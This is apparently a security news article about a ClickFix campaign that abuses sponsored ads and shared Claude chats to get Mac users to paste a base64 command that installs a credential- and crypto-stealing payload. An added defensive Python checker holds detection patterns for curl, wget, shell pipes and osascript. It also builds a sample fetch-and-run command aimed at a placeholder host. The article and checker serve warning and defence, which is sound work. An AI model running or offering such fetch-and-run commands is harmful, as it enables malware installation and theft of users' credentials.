www.malwarebytes.com 5/12/2026, 4:20:41 PM · via preferred

Claude chat scam lures Mac users to steal credentials, crypto


Researchers have found that criminals are using sponsored search results and shared Claude chats to lure Mac users into a ClickFix attack, a social‑engineering technique that covertly installs malware on the device. The technique involves ads that appear to link to the legitimate claude[.]ai domain but resolve to real Claude shared chats, framed as “Claude Code on Mac” or Apple Support guides.

The attackers prompt victims to open Terminal and paste a base64‑encoded command, which fetches a loader shell script from attacker‑controlled infrastructure and runs it in memory. The script profiles the system, downloads a second‑stage payload, and executes it via osascript, giving the attacker remote code execution without dropping a traditional application.
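A defender-side check for the pasted command described above, as an added example that is not from the article or the researchers: it decodes base64 layers in a command that a guide asks the user to paste and reports the download-and-execute indicators found at any layer. The regular expressions, the 24-character threshold, the function names and the example.invalid sample are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a command (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators drawn from the chain described above; the patterns are illustrative.
INDICATORS = {
    "decodes base64": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "runs osascript": re.compile(r"\bosascript\b"),
}

def decode_layers(text, max_depth=3):
    """Return text plus every base64 payload inside it that decodes to UTF-8, recursively."""
    layers = [text]
    if max_depth == 0:
        return layers
    for run in B64_RUN.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 text, e.g. a long path or identifier
        layers.extend(decode_layers(decoded, max_depth - 1))
    return layers

def review_pasted_command(command):
    """List the indicators present in a command or in anything it decodes to."""
    layers = decode_layers(command)
    return sorted(name for name, rx in INDICATORS.items()
                  if any(rx.search(layer) for layer in layers))

# Constructed sample: placeholder host, encoded here so nothing is hidden.
INNER = "curl -fsSL http://example.invalid/loader.sh | zsh"
SAMPLE = "echo " + base64.b64encode(INNER.encode()).decode() + " | base64 -D | zsh"

if __name__ == "__main__":
    for finding in review_pasted_command(SAMPLE):
        print("flag:", finding)
```

The same function can be run over clipboard contents or shell history lines; a command that both decodes base64 and pipes into a shell merits review before it is executed.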

This culminates in a MacSync‑style payload that harvests browser credentials, cookies, Keychain contents and crypto wallet data, sending the information to attacker servers over HTTP. Independent research by BleepingComputer is noted in the article, and users on macOS Tahoe 26.4 and later are warned to be cautious and verify instructions independently.


Article by CyberSIXT